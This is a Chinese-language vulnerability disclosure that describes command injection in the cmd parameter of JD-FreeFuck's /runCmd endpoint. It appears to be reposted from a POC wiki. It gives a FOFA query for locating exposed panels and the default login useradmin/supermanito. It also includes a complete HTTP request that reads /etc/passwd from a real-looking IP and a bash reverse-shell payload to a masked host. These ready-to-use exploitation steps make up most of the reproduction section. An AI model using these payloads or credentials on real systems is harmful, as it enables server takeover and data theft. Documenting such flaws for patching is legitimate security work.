JD-FreeFuck 后台命令执行漏洞

  • A+
所属分类:安全文章

JD-FreeFuck 后台命令执行漏洞



:漏洞描述🐑


JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck


二:  漏洞影响🐇


JD-FreeFuck


三:  漏洞复现🐋


FOFA: title="京东薅羊毛控制面板"


访问后登录页面如下

JD-FreeFuck 后台命令执行漏洞




默认账号密码为useradmin/supermanito


JD-FreeFuck 后台命令执行漏洞


发送如下请求包执行命令

POST /runCmd HTTP/1.1Host: 101.200.189.251:5678Content-Length: 50Pragma: no-cacheCache-Control: no-cacheAccept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7UConnection: close
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

其中 cmd 参数存在命令注入

JD-FreeFuck 后台命令执行漏洞

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500

JD-FreeFuck 后台命令执行漏洞



 四:  参考文章🦉

@桃花心 师傅

https://www.secquan.org/Discuss/1071932#reply3


 五:  关于文库🦉



在线文库:

http://wiki.peiqi.tech


Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

投稿的师傅联系私聊我~






本文始发于微信公众号(PeiQi文库):JD-FreeFuck 后台命令执行漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: